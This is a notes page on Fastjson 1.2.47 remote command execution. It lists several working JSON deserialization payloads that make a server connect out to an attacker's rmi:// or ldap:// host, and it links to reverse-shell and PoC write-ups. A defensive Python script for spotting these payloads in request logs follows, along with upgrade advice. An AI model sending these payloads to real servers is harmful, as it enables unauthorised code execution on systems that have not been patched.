Fastjson <= 1.2.47 remote command execution: notes on exploitation tools and methods
PoC
The rmi:// and ldap:// schemes can be swapped and tried in turn.
param={
    "a": {
        "@type": "java.lang.Class",
        "val": "com.sun.rowset.JdbcRowSetImpl"
    },
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "ldap://your ip/",
        "autoCommit": true
    }
}
param={
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "rmi://your ip/",
        "autoCommit": true
    }
}
param={"orderNo":"B200414195915053000","partnerOrderNo":"DC200414593341","x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://your ip/","autoCommit":true}}
param={"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://your ip/","autoCommit":true}}
param={"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://9jo6zi.dnslog.cn","autoCommit":true}
param={"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://your ip/","autoCommit":true}
If the listening server receives traffic, continue with the next step; a dnslog service can be used for this check.
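Every payload above carries the same stable indicators: an "@type" key, the com.sun.rowset.JdbcRowSetImpl gadget (either directly or pre-loaded through a java.lang.Class/val pair), and a dataSourceName that points at an rmi:// or ldap:// URL. The following is an added triage script, not code from this page or from any of the linked projects, that flags those indicators in request bodies so a defender can spot attempts in access logs or a WAF replay. The denylist, the sample bodies and the 198.51.100.7 address are constructed for illustration; bodies that fail to parse as JSON (one payload on this page has an extra brace) fall back to a text match so the indicator is not lost.

```python
"""Defensive triage: flag Fastjson autoType-abuse indicators in request bodies.

Added example for this page; not code from the page or the linked projects.
The denylist and sample bodies are constructed for illustration.
"""
import json
import re

# Gadget class used by every payload on this page. Assumed minimal denylist,
# not fastjson's own blacklist.
GADGET_CLASSES = {"com.sun.rowset.JdbcRowSetImpl"}

# JNDI schemes the payloads place in dataSourceName.
JNDI_SCHEME = re.compile(r"^(?:rmi|ldap)://", re.IGNORECASE)

# Text-level fallbacks for bodies that do not parse as JSON.
TYPE_KEY = re.compile(r'"@type"\s*:\s*"([^"]+)"')
DSN_KEY = re.compile(r'"dataSourceName"\s*:\s*"((?:rmi|ldap)://[^"]*)"', re.IGNORECASE)


def _walk(node, path, findings):
    """Recursively inspect a parsed JSON value and append indicator strings."""
    label = path or "$"
    if isinstance(node, dict):
        t = node.get("@type")
        if t == "java.lang.Class" and node.get("val") in GADGET_CLASSES:
            # The 1.2.47 shape: java.lang.Class with "val" naming the gadget is
            # used to get the gadget into the parser's type cache first.
            findings.append(f"{label}: java.lang.Class cache-priming for {node['val']}")
        elif t in GADGET_CLASSES:
            findings.append(f"{label}: @type references gadget {t}")
        elif isinstance(t, str):
            findings.append(f"{label}: @type present ({t})")
        dsn = node.get("dataSourceName")
        if isinstance(dsn, str) and JNDI_SCHEME.match(dsn):
            findings.append(f"{label}: dataSourceName points at JNDI URL {dsn}")
        for key, value in node.items():
            _walk(value, f"{path}.{key}" if path else key, findings)
    elif isinstance(node, list):
        for i, value in enumerate(node):
            _walk(value, f"{label}[{i}]", findings)


def inspect_body(body: str) -> list:
    """Return indicator strings for one request body (empty list = nothing flagged).

    Accepts a bare JSON document or a 'param=<json>' form value as on this page.
    """
    text = body.strip()
    if text and text[0] not in "{[" and "=" in text:
        text = text.split("=", 1)[1]
    findings = []
    try:
        _walk(json.loads(text), "", findings)
    except ValueError:
        # Hand-built payloads are sometimes unbalanced (one on this page has an
        # extra brace); the indicators are still visible as text.
        for t in TYPE_KEY.findall(text):
            findings.append(f"<unparsed>: @type present ({t})")
        for dsn in DSN_KEY.findall(text):
            findings.append(f"<unparsed>: dataSourceName points at JNDI URL {dsn}")
    return findings


def scan(bodies) -> list:
    """Return (body, findings) pairs for every body that produced a finding."""
    flagged = []
    for body in bodies:
        findings = inspect_body(body)
        if findings:
            flagged.append((body, findings))
    return flagged


# Constructed sample request bodies; 198.51.100.7 is a documentation address.
SAMPLE_BODIES = [
    '{"orderNo":"B200414195915053000","partnerOrderNo":"DC200414593341"}',
    'param={"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},'
    '"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://198.51.100.7/","autoCommit":true}}',
    'param={"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://198.51.100.7/","autoCommit":true}',
    'param={"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},'
    '"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://198.51.100.7/","autoCommit":true}}}',
]

if __name__ == "__main__":
    for body, findings in scan(SAMPLE_BODIES):
        print(body[:60] + "...")
        for finding in findings:
            print("   ", finding)
```

Three of the four constructed bodies are flagged; the benign order record produces nothing, since it carries no "@type" key at all. Treat a hit on the java.lang.Class cache-priming pattern as high confidence: legitimate clients have no reason to send that pair. On the mitigation side the real fix is upgrading fastjson and keeping autoType disabled; later releases also provide a safeMode switch that turns autoType off entirely.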
References
Reverse shell: https://blog.csdn.net/Jiajiajiang_/article/details/103255659
Reproduction payload: https://blog.51cto.com/13770310/2425330?source=dra
Lab environment: https://vulhub.org/#/environments/fastjson/1.2.24-rce/
Tutorial: https://github.com/shengqi158/fastjson-remote-code-execute-poc